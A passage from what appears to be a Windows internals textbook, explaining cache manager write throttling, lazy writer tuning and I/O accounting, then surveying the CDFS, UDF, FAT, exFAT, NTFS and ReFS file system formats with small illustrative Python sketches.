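assert not can_i_write(4096 * 600, dirty_pages=500, dirty_page_threshold=1000)  # blocked
```

When the predicate fails, the caller either blocks (synchronous I/O) or registers a deferred-write callback, mirroring the CcDeferWrite path described above.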
Note The effects of write throttling are volume-aware, such that if a user is copying a large
file on, say, a RAID-0 SSD while also transferring a document to a portable USB thumb drive,
writes to the USB disk will not cause write throttling to occur on the SSD transfer.
The dirty page threshold is the number of pages that the system cache will allow to be dirty before
throttling cached writers. This value is computed when the cache manager partition is initialized (the
system partition is created and initialized at phase 1 of the NT kernel startup) and depends on the
product type (client or server). As seen in the previous paragraphs, two other values are also com-
puted—the top dirty page threshold and the bottom dirty page threshold. Depending on memory
consumption and the rate at which dirty pages are being processed, the lazy writer scan calls the
internal function CcAdjustThrottle, which, on server systems, performs dynamic adjustment of the cur-
rent threshold based on the calculated top and bottom values. This adjustment is made to preserve the
read cache in cases of a heavy write load that will inevitably overrun the cache and become throttled.
Table 11-1 lists the algorithms used to calculate the dirty page thresholds.
TABLE 11-1 Algorithms for calculating the dirty page thresholds

Product Type    Dirty Page Threshold    Top Dirty Page Threshold    Bottom Dirty Page Threshold
Client          Physical pages / 8      Physical pages / 8          Physical pages / 8
Server          Physical pages / 2      Physical pages / 2          Physical pages / 8
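The table's algorithms transcribe directly into arithmetic (the function name is ours; the divisors come straight from Table 11-1):

```python
# Direct transcription of Table 11-1: dirty page thresholds as a function of
# physical pages and product type.

def dirty_page_thresholds(physical_pages, product_type):
    if product_type == "client":
        t = physical_pages // 8
        return {"threshold": t, "top": t, "bottom": t}
    # Server: larger threshold, but the bottom limit stays at 1/8.
    return {"threshold": physical_pages // 2,
            "top": physical_pages // 2,
            "bottom": physical_pages // 8}

# A machine with 4 GB of RAM has 1,048,576 4-KB pages:
assert dirty_page_thresholds(1048576, "client")["threshold"] == 131072
assert dirty_page_thresholds(1048576, "server")["threshold"] == 524288
assert dirty_page_thresholds(1048576, "server")["bottom"] == 131072
```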
Write throttling is also useful for network redirectors transmitting data over slow communica-
tion lines. For example, suppose a local process writes a large amount of data to a remote file system
over a slow 640 Kbps line. The data isn’t written to the remote disk until the cache manager’s lazy
writer flushes the cache. If the redirector has accumulated lots of dirty pages that are flushed to disk
at once, the recipient could receive a network timeout before the data transfer completes. By using
the CcSetDirtyPageThreshold function, the cache manager allows network redirectors to set a limit on
the number of dirty cache pages they can tolerate (for each stream), thus preventing this scenario. By
limiting the number of dirty pages, the redirector ensures that a cache flush operation won’t cause a
network timeout.
System threads
As mentioned earlier, the cache manager performs lazy write and read-ahead I/O operations by
submitting requests to the common critical system worker thread pool. However, it does limit the use
of these threads to one less than the total number of critical system worker threads. In client systems,
there are 5 total critical system worker threads, whereas in server systems there are 10.
Internally, the cache manager organizes its work requests into four lists (though these are serviced
by the same set of executive worker threads):
■ The express queue is used for read-ahead operations.
■ The regular queue is used for lazy write scans (for dirty data to flush), write-behinds, and lazy closes.
■ The fast teardown queue is used when the memory manager is waiting for the data section owned by the cache manager to be freed so that the file can be opened with an image section instead, which causes CcWriteBehind to flush the entire file and tear down the shared cache map.
■ The post tick queue is used for the cache manager to internally register for a notification after each “tick” of the lazy writer thread—in other words, at the end of each pass.
To keep track of the work items the worker threads need to perform, the cache manager creates
its own internal per-processor look-aside list—a fixed-length list (one for each processor) of worker
queue item structures. (Look-aside lists are discussed in Chapter 5 of Part 1.) The number of worker
queue items depends on system type: 128 for client systems, and 256 for server systems. For cross-
processor performance, the cache manager also allocates a global look-aside list at the same sizes as
just described.
Aggressive write behind and low-priority lazy writes
With the goal of improving cache manager performance, and to achieve compatibility with low-speed
disk devices (like eMMC disks), the cache manager lazy writer has gone through substantial improve-
ments in Windows 8.1 and later.
As seen in the previous paragraphs, the lazy writer scan adjusts the dirty page threshold and its
top and bottom limits. Multiple adjustments are made on the limits, by analyzing the history of the
total number of available pages. Other adjustments are performed to the dirty page threshold itself
by checking whether the lazy writer has been able to write the expected total number of pages in the
last execution cycle (one per second). If the total number of written pages in the last cycle is less than
the expected number (calculated by the CcCalculatePagesToWrite routine), it means that the underly-
ing disk device was not able to support the generated I/O throughput, so the dirty page threshold is
lowered (this means that more I/O throttling is performed, and some cache manager clients will wait
when calling CcCanIWrite API). In the opposite case, in which there are no remaining pages from the
last cycle, the lazy writer scan can easily raise the threshold. In both cases, the threshold needs to stay
inside the range described by the bottom and top limits.
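The per-cycle adjustment just described can be sketched as follows (a hypothetical model of the CcAdjustThrottle-style logic; the step size is illustrative, only the clamp to the bottom and top limits comes from the text):

```python
# Sketch of the lazy writer's per-cycle threshold adjustment: lower the
# threshold when the disk fell behind, raise it when it kept up, and always
# clamp to [bottom, top].

def adjust_threshold(threshold, pages_written, pages_expected, top, bottom, step=64):
    if pages_written < pages_expected:
        threshold -= step   # disk couldn't sustain the I/O: throttle harder
    else:
        threshold += step   # no backlog: allow more dirty data
    return max(bottom, min(top, threshold))

assert adjust_threshold(1000, pages_written=400, pages_expected=800,
                        top=2000, bottom=500) == 936
assert adjust_threshold(1990, pages_written=800, pages_expected=800,
                        top=2000, bottom=500) == 2000   # clamped at the top limit
```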
The biggest improvement has been made thanks to the Extra Write Behind worker threads. In server
SKUs, the maximum number of these threads is nine (which corresponds to the total number of critical
system worker threads minus one), while in client editions it is only one. When a system lazy write scan
is requested by the cache manager, the system checks whether dirty pages are contributing to memory
pressure (using a simple formula that verifies that the number of dirty pages is less than a quarter of
the dirty page threshold, and less than half of the available pages). If so, the systemwide cache manager
thread pool routine (CcWorkerThread) uses a complex algorithm that determines whether it can add
another lazy writer thread that will write dirty pages to disk in parallel with the others.
To correctly understand whether it is possible to add another thread that will emit additional I/Os,
without getting worse system performance, the cache manager calculates the disk throughput of
the old lazy write cycles and keeps track of their performance. If the throughput of the current cycles
is equal or better than the previous one, it means that the disk can support the overall I/O level, so
it makes sense to add another lazy writer thread (which is called an Extra Write Behind thread in this
case). If, on the other hand, the current throughput is lower than the previous cycle, it means that the
underlying disk is not able to sustain additional parallel writes, so the Extra Write Behind thread is
removed. This feature is called Aggressive Write Behind.
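The two decisions involved, the memory-pressure check and the throughput-driven add/remove of Extra Write Behind threads, can be modeled like this (our simplification; the real CcWorkerThread algorithm is more complex):

```python
# Sketch of the Aggressive Write Behind decisions described above.

def dirty_pages_ok(dirty, threshold, available):
    # The pressure formula from the text: dirty pages must be less than a
    # quarter of the threshold and less than half of the available pages.
    return dirty < threshold // 4 and dirty < available // 2

def adjust_writer_count(writers, current_throughput, previous_throughput, max_writers):
    if current_throughput >= previous_throughput:
        return min(writers + 1, max_writers)   # disk keeps up: add a thread
    return max(writers - 1, 1)                 # disk saturated: remove one

assert dirty_pages_ok(dirty=100, threshold=1000, available=4000)
assert not dirty_pages_ok(dirty=300, threshold=1000, available=4000)
assert adjust_writer_count(2, 500, 400, max_writers=9) == 3   # server SKU cap
assert adjust_writer_count(2, 300, 400, max_writers=9) == 1
```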
In Windows client editions, the cache manager enables an optimization designed to deal with low-
speed disks. When a lazy writer scan is requested, and when the file system drivers write to the cache,
the cache manager employs an algorithm to decide if the lazy writer threads should execute at low
priority. (For more information about thread priorities, refer to Chapter 4 of Part 1.) The cache manager
applies low priority to the lazy writers by default if the following conditions are met (otherwise, the
cache manager still uses the normal priority):
■ The caller is not waiting for the current lazy scan to be finished.
■ The total size of the partition’s dirty pages is less than 32 MB.
If the two conditions are satisfied, the cache manager queues the work items for the lazy writers in
the low-priority queue. The lazy writers are started by a system worker thread, which executes at prior-
ity 6 – Lowest. Furthermore, the lazy writer sets its I/O priority to Lowest just before emitting the actual
I/O to the correct file-system driver.
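The two conditions reduce to a simple predicate (a sketch; the 32-MB limit comes from the text, the function name is ours):

```python
# The low-priority lazy write decision on client editions, as a predicate.

MB = 1024 * 1024

def use_low_priority(caller_waiting, dirty_bytes):
    # Low priority only when nobody is waiting on the scan and the
    # partition's dirty data is small.
    return (not caller_waiting) and dirty_bytes < 32 * MB

assert use_low_priority(caller_waiting=False, dirty_bytes=10 * MB)
assert not use_low_priority(caller_waiting=True, dirty_bytes=10 * MB)
assert not use_low_priority(caller_waiting=False, dirty_bytes=64 * MB)
```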
Dynamic memory
As seen in the previous paragraph, the dirty page threshold is calculated dynamically based on the
available amount of physical memory. The cache manager uses the threshold to decide when to
throttle incoming writes and whether to be more aggressive about writing behind.
Before the introduction of partitions, the calculation was made in the CcInitializeCacheManager
routine (by checking the MmNumberOfPhysicalPages global value), which was executed during the
kernel’s phase 1 initialization. Now, the cache manager Partition’s initialization function performs the
calculation based on the available physical memory pages that belong to the associated memory parti-
tion. (For further details about cache manager partitions, see the section “Memory partitions support,”
earlier in this chapter.) This is not enough, though, because Windows also supports the hot-addition
of physical memory, a feature that is deeply used by HyperV for supporting dynamic memory for
child VMs.
During memory manager phase 0 initialization, MiCreatePfnDatabase calculates the maximum
possible size of the PFN database. On 64-bit systems, the memory manager assumes that the maxi-
mum possible amount of installed physical memory is equal to all the addressable virtual memory
range (256 TB on non-LA57 systems, for example). The system asks the memory manager to reserve
the amount of virtual address space needed to store a PFN for each virtual page in the entire address
space. (The size of this hypothetical PFN database is around 64 GB.) MiCreateSparsePfnDatabase then
cycles between each valid physical memory range that Winload has detected and maps valid PFNs into
the database. The PFN database uses sparse memory. When the MiAddPhysicalMemory routine detects
new physical memory, it creates new PFNs simply by allocating new regions inside the PFN database.
Dynamic Memory has already been described in Chapter 9, “Virtualization technologies”; further de-
tails are available there.
The cache manager needs to detect the new hot-added or hot-removed memory and adapt to the
new system configuration, otherwise multiple problems could arise:
■ In cases where new memory has been hot-added, the cache manager might think that the system has less memory, so its dirty pages threshold is lower than it should be. As a result, the cache manager doesn’t cache as many dirty pages as it should, so it throttles writes much sooner.
■ If large portions of available memory are locked or aren’t available anymore, performing cached I/O on the system could hurt the responsiveness of other applications (which, after the hot-remove, will basically have no more memory).
To correctly deal with this situation, the cache manager doesn’t register a callback with the memory
manager but implements an adaptive correction in the lazy writer scan (LWS) thread. Other than
scanning the list of shared cache maps and deciding which dirty pages to write, the LWS thread has the
ability to change the dirty pages threshold depending on foreground rate, its write rate, and available
memory. The LWS maintains a history of average available physical pages and dirty pages that belong
to the partition. Every second, the LWS thread updates these lists and calculates aggregate values.
Using the aggregate values, the LWS is able to respond to memory size variations, absorbing the spikes
and gradually modifying the top and bottom thresholds.
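The history mechanism amounts to reacting to a smoothed average rather than to any single sample. A minimal sketch (window length and arithmetic are illustrative, not the kernel's actual bookkeeping):

```python
# Sketch of the LWS history lists: a rolling window of per-second samples
# whose aggregate absorbs transient spikes.

from collections import deque

class History:
    def __init__(self, length=8):
        self.samples = deque(maxlen=length)   # oldest samples fall off

    def record(self, value):
        self.samples.append(value)

    def average(self):
        return sum(self.samples) // len(self.samples)

avail = History()
for pages in (4000, 4100, 50, 4050):   # one transient dip in available memory
    avail.record(pages)
assert avail.average() == 3050          # the spike is absorbed, not acted on alone
```

Basing the threshold adjustments on such aggregates is what lets the LWS modify the top and bottom limits gradually instead of oscillating with every memory-size variation.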
Cache manager disk I/O accounting
Before Windows 8.1, it wasn’t possible to precisely determine the total amount of I/O performed by a
single process. The reasons behind this were multiple:
■ Lazy writes and read-aheads don’t happen in the context of the process/thread that caused the I/O. The cache manager writes out the data lazily, completing the write in a different context (usually the System context) than that of the thread that originally wrote the file. (The actual I/O can even happen after the process has terminated.) Likewise, the cache manager can choose to read-ahead, bringing in more data from the file than the process requested.
■ Asynchronous I/O is still managed by the cache manager, but there are cases in which the cache manager is not involved at all, like for non-cached I/Os.
■ Some specialized applications can emit low-level disk I/O using a lower-level driver in the disk stack.
Windows stores a pointer to the thread that emitted the I/O in the tail of the IRP. This thread is not
always the one that originally started the I/O request. As a result, the I/O accounting was often
wrongly associated with the System process. Windows 8.1 resolved the problem by introducing the
PsUpdateDiskCounters API, used by both the cache manager and file system drivers, which need to
tightly cooperate. The function stores the total number of bytes read and written and the number of
I/O operations in the core EPROCESS data structure that is used by the NT kernel to describe a process.
(You can read more details in Chapter 3 of Part 1.)
The cache manager updates the process disk counters (by calling the PsUpdateDiskCounters func-
tion) while performing cached reads and writes (through all of its exposed file system interfaces) and
while emitting read-ahead I/O (through the exported CcScheduleReadAheadEx API). The NTFS and ReFS
file system drivers call PsUpdateDiskCounters while performing non-cached and paging I/O.
Like CcScheduleReadAheadEx, multiple cache manager APIs have been extended to accept a pointer
to the thread that has emitted the I/O and should be charged for it (CcCopyReadEx and CcCopyWriteEx
are good examples). In this way, updated file system drivers can even control which thread to charge in
case of asynchronous I/O.
Other than per-process counters, the cache manager also maintains a Global Disk I/O counter,
which globally keeps track of all the I/O that has been issued by file systems to the storage stack. (The
counter is updated every time a non-cached and paging I/O is emitted through file system drivers.)
Thus, this global counter, when subtracted from the total I/O emitted to a particular disk device (a value
that an application can obtain by using the IOCTL_DISK_PERFORMANCE control code), represents the
I/O that could not be attributed to any particular process (paging I/O emitted by the Modified Page
Writer for example, or I/O performed internally by Mini-filter drivers).
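The relationship between the counters is plain subtraction (the byte values below are made up for illustration):

```python
# The subtraction described above: per-disk total I/O minus the file systems'
# global counter yields the I/O that no process can be charged for.

MB = 1024 * 1024
total_disk_io = 900 * MB    # per-disk total, e.g. via IOCTL_DISK_PERFORMANCE
fs_global_io  = 850 * MB    # cache manager's Global Disk I/O counter

unattributed = total_disk_io - fs_global_io   # e.g., Modified Page Writer I/O,
                                              # or mini-filter-internal I/O
assert unattributed == 50 * MB
```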
The new per-process disk counters are exposed through the NtQuerySystemInformation API using
the SystemProcessInformation information class. This is the method that diagnostics tools like Task
Manager or Process Explorer use for precisely querying the I/O numbers related to the processes cur-
rently running in the system.
EXPERIMENT: Counting disk I/Os
You can see a precise counting of the total system I/Os by using the different counters exposed
by the Performance Monitor. Open Performance Monitor and add the FileSystem Bytes Read
and FileSystem Bytes Written counters, which are available in the FileSystem Disk Activity group.
Furthermore, for this experiment you need to add the per-process disk I/O counters that are
available in the Process group, named IO Read Bytes/sec and IO Write Bytes/sec. When you
add these last two counters, make sure that you select the Explorer process in the Instances Of
Selected Object box.
When you start to copy a big file, you see the counters belonging to the Explorer process
increasing until they match the counters shown in the global FileSystem Disk Activity group.
File systems
In this section, we present an overview of the file system formats supported by Windows.
We then describe the types of file system drivers and their basic operation, including how they interact
with other system components, such as the memory manager and the cache manager. Following that,
we describe in detail the functionality and the data structures of the two most important file systems:
NTFS and ReFS. We start by analyzing their internal architectures and then focus on the on-disk layout
of the two file systems and their advanced features, such as compression, recoverability, encryption,
tiering support, file-snapshot, and so on.
Windows file system formats
Windows includes support for the following file system formats:
■ CDFS
■ UDF
■ FAT12, FAT16, and FAT32
■ exFAT
■ NTFS
■ ReFS
Each of these formats is best suited for certain environments, as you’ll see in the following sections.
CDFS
CDFS (%SystemRoot%\System32\Drivers\Cdfs.sys), or CD-ROM file system, is a read-only file system
driver that supports a superset of the ISO-9660 format as well as a superset of the Joliet disk format.
Although the ISO-9660 format is relatively simple and has limitations such as ASCII uppercase names
with a maximum length of 32 characters, Joliet is more flexible and supports Unicode names of arbi-
trary length. If structures for both formats are present on a disk (to offer maximum compatibility), CDFS
uses the Joliet format. CDFS has a couple of restrictions:
■ A maximum file size of 4 GB
■ A maximum of 65,535 directories
CDFS is considered a legacy format because the industry has adopted the Universal Disk Format
(UDF) as the standard for optical media.
UDF
The Windows Universal Disk Format (UDF) file system implementation is OSTA (Optical Storage
Technology Association) UDF-compliant. (UDF is a subset of the ISO-13346 format with extensions for
formats such as CD-R and DVD-R/RW.) OSTA defined UDF in 1995 as a format to replace the ISO-9660
format for magneto-optical storage media, mainly DVD-ROM. UDF is included in the DVD specification
and is more flexible than CDFS. The UDF file system format has the following traits:
■ Directory and file names can be 254 ASCII or 127 Unicode characters long.
■ Files can be sparse. (Sparse files are defined later in this chapter, in the “Compression and sparse files” section.)
■ File sizes are specified with 64 bits.
■ Support for access control lists (ACLs).
■ Support for alternate data streams.
The UDF driver supports UDF versions up to 2.60. The UDF format was designed with rewritable me-
dia in mind. The Windows UDF driver (%SystemRoot%\System32\Drivers\Udfs.sys) provides read-write
support for Blu-ray, DVD-RAM, CD-R/RW, and DVD+-R/RW drives when using UDF 2.50 and read-only
support when using UDF 2.60. However, Windows does not implement support for certain UDF fea-
tures such as named streams and access control lists.
FAT12, FAT16, and FAT32
Windows supports the FAT file system primarily for compatibility with other operating systems in mul-
tiboot systems, and as a format for flash drives or memory cards. The Windows FAT file system driver is
implemented in %SystemRoot%\System32\Drivers\Fastfat.sys.
The name of each FAT format includes a number that indicates the number of bits that the particular
format uses to identify clusters on a disk. FAT12’s 12-bit cluster identifier limits a partition to storing a
maximum of 2^12 (4,096) clusters. Windows permits cluster sizes from 512 bytes to 8 KB, which limits a
FAT12 volume size to 32 MB.
Note All FAT file system types reserve the first 2 clusters and the last 16 clusters of a volume,
so the number of usable clusters for a FAT12 volume, for instance, is slightly less than 4,096.
FAT16, with a 16-bit cluster identifier, can address 2^16 (65,536) clusters. On Windows, FAT16 cluster
sizes range from 512 bytes (the sector size) to 64 KB (on disks with a 512-byte sector size), which limits
FAT16 volume sizes to 4 GB. Disks with a sector size of 4,096 bytes allow for clusters of 256 KB. The clus-
ter size Windows uses depends on the size of a volume. The various sizes are listed in Table 11-2. If you
format a volume that is less than 16 MB as FAT by using the format command or the Disk Management
snap-in, Windows uses the FAT12 format instead of FAT16.
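The size limits above follow directly from cluster count times maximum cluster size; the arithmetic can be checked like this (a direct transcription of the numbers in the text, with a helper name of our choosing):

```python
# FAT volume size limit = (2 ^ cluster-identifier bits) x maximum cluster size.

def fat_max_volume_bytes(cluster_bits, max_cluster_size):
    return (2 ** cluster_bits) * max_cluster_size

KB, MB, GB = 1024, 1024**2, 1024**3
assert fat_max_volume_bytes(12, 8 * KB) == 32 * MB    # FAT12: 4,096 x 8 KB
assert fat_max_volume_bytes(16, 64 * KB) == 4 * GB    # FAT16: 65,536 x 64 KB
```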
TABLE 11-2 Default FAT16 cluster sizes in Windows

Volume Size         Default Cluster Size
<8 MB               Not supported
8 MB–32 MB          512 bytes
32 MB–64 MB         1 KB
64 MB–128 MB        2 KB
128 MB–256 MB       4 KB
256 MB–512 MB       8 KB
512 MB–1,024 MB     16 KB
1 GB–2 GB           32 KB
2 GB–4 GB           64 KB
>16 GB              Not supported
A FAT volume is divided into several regions, which are shown in Figure 11-14. The file allocation table,
which gives the FAT file system format its name, has one entry for each cluster on a volume. Because
the file allocation table is critical to the successful interpretation of a volume’s contents, the FAT format
maintains two copies of the table so that if a file system driver or consistency-checking program (such as
Chkdsk) can’t access one (because of a bad disk sector, for example), it can read from the other.
FIGURE 11-14 FAT format organization: boot sector, file allocation table 1, file allocation table 2 (duplicate), root directory, then other directories and all files.
Entries in the file allocation table define file-allocation chains (shown in Figure 11-15) for files and
directories, where the links in the chain are indexes to the next cluster of a file’s data. A file’s directory
entry stores the starting cluster of the file. The last entry of the file’s allocation chain is the reserved
value of 0xFFFF for FAT16 and 0xFFF for FAT12. The FAT entries for unused clusters have a value of 0. You
can see in Figure 11-15 that FILE1 is assigned clusters 2, 3, and 4; FILE2 is fragmented and uses clusters 5,
6, and 8; and FILE3 uses only cluster 7. Reading a file from a FAT volume can involve reading large por-
tions of a file allocation table to traverse the file’s allocation chains.
FIGURE 11-15 Sample FAT file-allocation chains.
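Chain traversal can be sketched directly from the FAT contents described for Figure 11-15 (FAT16 values; clusters 0 and 1 are reserved, 0xFFFF marks end-of-chain, 0 marks an unused cluster; the function name is ours):

```python
# Following FAT allocation chains over the FAT contents of Figure 11-15.

END_OF_CHAIN = 0xFFFF
#       index:  0     1     2       3       4       5       6       7       8       9
fat = [None, None, 0x0003, 0x0004, 0xFFFF, 0x0006, 0x0008, 0xFFFF, 0xFFFF, 0x0000]

def allocation_chain(fat, start_cluster):
    """Walk the chain from a file's starting cluster (from its directory entry)."""
    chain = [start_cluster]
    while fat[chain[-1]] != END_OF_CHAIN:
        chain.append(fat[chain[-1]])
    return chain

assert allocation_chain(fat, 2) == [2, 3, 4]   # FILE1
assert allocation_chain(fat, 5) == [5, 6, 8]   # FILE2 (fragmented)
assert allocation_chain(fat, 7) == [7]         # FILE3
```

Note that reaching cluster 8 for FILE2 requires reading FAT entries 5 and 6 first, which is why traversing a fragmented file can mean reading large portions of the file allocation table.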
The root directory of FAT12 and FAT16 volumes is preassigned enough space at the start of a volume to
store 256 directory entries, which places an upper limit on the number of files and directories that can be
stored in the root directory. (There’s no preassigned space or size limit on FAT32 root directories.) A FAT
directory entry is 32 bytes and stores a file’s name, size, starting cluster, and time stamp (last-accessed,
created, and so on) information. If a file has a name that is Unicode or that doesn’t follow the MS-DOS 8.3
naming convention, additional directory entries are allocated to store the long file name. The supplemen-
tary entries precede the file’s main entry. Figure 11-16 shows a sample directory entry for a file named “The
quick brown fox.” The system has created a THEQUI~1.FOX 8.3 representation of the name (that is, you don’t
see a “.” in the directory entry because it is assumed to come after the eighth character) and used two more
directory entries to store the Unicode long file name. Each row in the figure is made up of 16 bytes.
[Figure: three 32-byte directory entries, 16 bytes per row. The second (and last) long entry (sequence byte 0x42, attribute 0x0F, checksum) holds the Unicode tail “wn.fox”; the first long entry (sequence byte 0x01, attribute 0x0F, checksum) holds “The quick bro”; the short entry holds the 8.3 name THEQUI~1FOX with attribute 0x20, NT byte, create time and date, last-access date, last-modified time and date, first cluster, and file size]
FIGURE 11-16 FAT directory entry.
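The 32-byte short-entry layout can be packed and parsed with a few lines of Python. The field order below (name, attribute, timestamps, first-cluster words, size) follows the standard FAT directory-entry layout; the sample values are made up for illustration:

```python
import struct

# Standard 32-byte FAT short directory entry, little-endian:
# name[11], attr, reserved, create-tenths, create time/date,
# last-access date, first-cluster high word, write time/date,
# first-cluster low word, file size. (Long-name entries differ.)
ENTRY = struct.Struct("<11sBBBHHHHHHHI")   # 32 bytes total

def parse_entry(raw):
    (name, attr, _res, _tenth, _ctime, _cdate, _adate,
     clus_hi, _wtime, _wdate, clus_lo, size) = ENTRY.unpack(raw)
    return {
        "name": name.decode("ascii").rstrip(),       # 8.3 name, e.g. THEQUI~1FOX
        "attributes": attr,
        "first_cluster": (clus_hi << 16) | clus_lo,  # high word used by FAT32 only
        "size": size,
    }

raw = ENTRY.pack(b"THEQUI~1FOX", 0x20, 0, 0, 0, 0, 0, 0, 0, 0, 2, 1024)
entry = parse_entry(raw)
print(entry["name"], entry["first_cluster"], entry["size"])
```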
FAT32 uses 32-bit cluster identifiers but reserves the high 4 bits, so in effect it has 28-bit cluster
identifiers. Because FAT32 cluster sizes can be as large as 64 KB, FAT32 has a theoretical ability to ad-
dress 16-terabyte (TB) volumes. Although Windows works with existing FAT32 volumes of larger sizes
(created in other operating systems), it limits new FAT32 volumes to a maximum of 32 GB. FAT32’s
higher potential cluster numbers let it manage disks more efficiently than FAT16; it can handle up to
128-GB volumes with 512-byte clusters. Table 11-3 shows default cluster sizes for FAT32 volumes.
TABLE 11-3 Default cluster sizes for FAT32 volumes
Partition Size    Default Cluster Size
<32 MB            Not supported
32 MB–64 MB       512 bytes
64 MB–128 MB      1 KB
128 MB–256 MB     2 KB
256 MB–8 GB       4 KB
8 GB–16 GB        8 KB
16 GB–32 GB       16 KB
>32 GB            Not supported
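The 28-bit addressing arithmetic quoted above, together with the defaults of Table 11-3, can be checked with a small sketch. The behavior at exact range boundaries is an assumption, since the table states ranges only:

```python
MB, GB = 2 ** 20, 2 ** 30

# FAT32 addressing arithmetic from the text: 28 usable cluster-number bits.
CLUSTERS = 2 ** 28
assert CLUSTERS * 64 * 1024 == 16 * 2 ** 40   # 64 KB clusters -> 16 TB volumes
assert CLUSTERS * 512 == 128 * 2 ** 30        # 512-byte clusters -> 128 GB volumes

def fat32_default_cluster(partition_bytes):
    """Default cluster size per Table 11-3; None where FAT32 is not supported."""
    if partition_bytes < 32 * MB or partition_bytes > 32 * GB:
        return None                            # outside the supported FAT32 range
    for limit, size in [(64 * MB, 512), (128 * MB, 1024), (256 * MB, 2048),
                        (8 * GB, 4096), (16 * GB, 8192), (32 * GB, 16384)]:
        if partition_bytes <= limit:
            return size

print(fat32_default_cluster(1 * GB))   # 4096
```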
Besides the higher limit on cluster numbers, other advantages FAT32 has over FAT12 and FAT16
include the fact that the FAT32 root directory isn’t stored at a predefined location on the volume, the
root directory doesn’t have an upper limit on its size, and FAT32 stores a second copy of the boot sector
for reliability. A limitation FAT32 shares with FAT16 is that the maximum file size is 4 GB because direc-
tories store file sizes as 32-bit values.
exFAT
Designed by Microsoft, the Extended File Allocation Table file system (exFAT, also called FAT64) is an
improvement over the traditional FAT file systems and is specifically designed for flash drives. The main
goal of exFAT is to provide some of the advanced functionality offered by NTFS without the metadata
structure overhead and metadata logging that create write patterns not suited for many flash media
devices. Table 11-4 lists the default cluster sizes for exFAT.
As the FAT64 name implies, the file size limit is increased to 2^64, allowing files up to 16 exabytes. This
change is also matched by an increase in the maximum cluster size, which is currently implemented as 32
MB but can be as large as 2^255 sectors. exFAT also adds a bitmap that tracks free clusters, which improves
the performance of allocation and deletion operations. Finally, exFAT allows more than 1,000 files in a
single directory. These characteristics result in increased scalability and support for large disk sizes.
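The performance benefit of the free-cluster bitmap comes from not having to scan FAT entries to find free space. A toy bitmap allocator (one bit per cluster; this is an illustration, not exFAT's on-disk bitmap format) looks like this:

```python
class ClusterBitmap:
    """Toy free-cluster bitmap: one bit per cluster, 1 = in use."""
    def __init__(self, nclusters):
        self.bits = bytearray((nclusters + 7) // 8)
        self.nclusters = nclusters

    def allocate(self):
        for i in range(self.nclusters):            # first-fit scan of the bitmap
            if not ((self.bits[i // 8] >> (i % 8)) & 1):
                self.bits[i // 8] |= 1 << (i % 8)  # mark cluster in use
                return i
        raise RuntimeError("volume full")

    def free(self, i):
        self.bits[i // 8] &= ~(1 << (i % 8))       # deletion is a single bit clear

bm = ClusterBitmap(16)
a, b = bm.allocate(), bm.allocate()   # clusters 0 and 1
bm.free(a)
print(bm.allocate())                  # reuses cluster 0
```

Freeing a file's clusters is just clearing bits, which is why deletion is cheap compared with walking and zeroing a FAT chain.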
TABLE 11-4 Default cluster sizes for exFAT volumes, 512-byte sector
Volume Size     Default Cluster Size
<256 MB         4 KB
256 MB–32 GB    32 KB
32 GB–512 GB    128 KB
512 GB–1 TB     256 KB
1 TB–2 TB       512 KB
2 TB–4 TB       1 MB
4 TB–8 TB       2 MB
8 TB–16 TB      4 MB
16 TB–32 TB     8 MB
32 TB–64 TB     16 MB
>64 TB          32 MB
Additionally, exFAT implements certain features previously available only in NTFS, such as sup-
port for access control lists (ACLs) and transactions (called Transaction-Safe FAT, or TFAT). While
the Windows Embedded CE implementation of exFAT includes these features, the version of exFAT
in Windows does not.
Note ReadyBoost (described in Chapter 5 of Part 1, “Memory Management”) can work with
exFAT-formatted flash drives to support cache files much larger than 4 GB.
NTFS
As noted at the beginning of the chapter, the NTFS file system is one of the native file system formats
of Windows. NTFS uses 64-bit cluster numbers. This capacity gives NTFS the ability to address volumes
of up to 16 exaclusters; however, Windows limits the size of an NTFS volume to that addressable with
32-bit clusters, which is slightly less than 8 petabytes (using 2 MB clusters). Table 11-5 shows the default
cluster sizes for NTFS volumes. (You can override the default when you format an NTFS volume.) NTFS
also supports 2^32 – 1 files per volume. The NTFS format allows for files that are 16 exabytes in size, but the
implementation limits the maximum file size to 16 TB.
TABLE 11-5 Default cluster sizes for NTFS volumes
Volume Size      Default Cluster Size
<7 MB            Not supported
7 MB–16 TB       4 KB
16 TB–32 TB      8 KB
32 TB–64 TB      16 KB
64 TB–128 TB     32 KB
128 TB–256 TB    64 KB
256 TB–512 TB    128 KB
512 TB–1,024 TB  256 KB
1 PB–2 PB        512 KB
2 PB–4 PB        1 MB
4 PB–8 PB        2 MB
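The volume-size arithmetic behind the Windows NTFS limit quoted above can be verified directly (2^32 cluster numbers at the largest 2 MB default cluster size; the usable maximum is slightly less than this because a few cluster values are not available for data):

```python
# NTFS limits as described in the text, checked numerically.
clusters_32bit = 2 ** 32        # Windows limits NTFS to 32-bit cluster numbers
cluster_2mb = 2 * 2 ** 20       # largest default cluster size in Table 11-5

max_volume = clusters_32bit * cluster_2mb
print(max_volume == 2 ** 53)    # 8 PiB with 2 MB clusters
```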
NTFS includes a number of advanced features, such as file and directory security, alternate data
streams, disk quotas, sparse files, file compression, symbolic (soft) and hard links, support for transac-
tional semantics, junction points, and encryption. One of its most significant features is recoverability.
If a system is halted unexpectedly, the metadata of a FAT volume can be left in an inconsistent state,
leading to the corruption of large amounts of file and directory data. NTFS logs changes to metadata
in a transactional manner so that file system structures can be repaired to a consistent state with no
loss of file or directory structure information. (File data can be lost unless the user is using TxF, which is
covered later in this chapter.) Additionally, the NTFS driver in Windows also implements self-healing, a
mechanism through which it makes most minor repairs to corruption of file system on-disk structures
while Windows is running and without requiring a reboot.
Note At the time of this writing, the common physical sector size of disk devices is 4 KB. Even
for these disk devices, for compatibility reasons, the storage stack exposes to file system driv-
ers a logical sector size of 512 bytes. The calculation performed by the NTFS driver to deter-
mine the correct size of the cluster uses logical sector sizes rather than the actual physical size.
Starting with Windows 10, NTFS supports DAX volumes natively. (DAX volumes are discussed later
in this chapter, in the “DAX volumes” section.) The NTFS file system driver also supports I/O to this kind
of volume using large pages. Mapping a file that resides on a DAX volume using large pages is possible
in two ways: NTFS can automatically align the file to a 2-MB cluster boundary, or the volume can be
formatted using a 2-MB cluster size.
ReFS
The Resilient File System (ReFS) is another file system that Windows supports natively. It has been
designed primarily for large storage servers with the goal of overcoming some limitations of NTFS, such as
its lack of online self-healing or volume repair and its lack of support for file snapshots. ReFS is a “write-
to-new” file system, which means that volume metadata is always updated by writing new data to
the underlying medium and by marking the old metadata as deleted. The lower level of the ReFS file
system (which understands the on-disk data structure) uses an object store library, called Minstore,
that provides a key-value table interface to its callers. Minstore is similar to a modern database
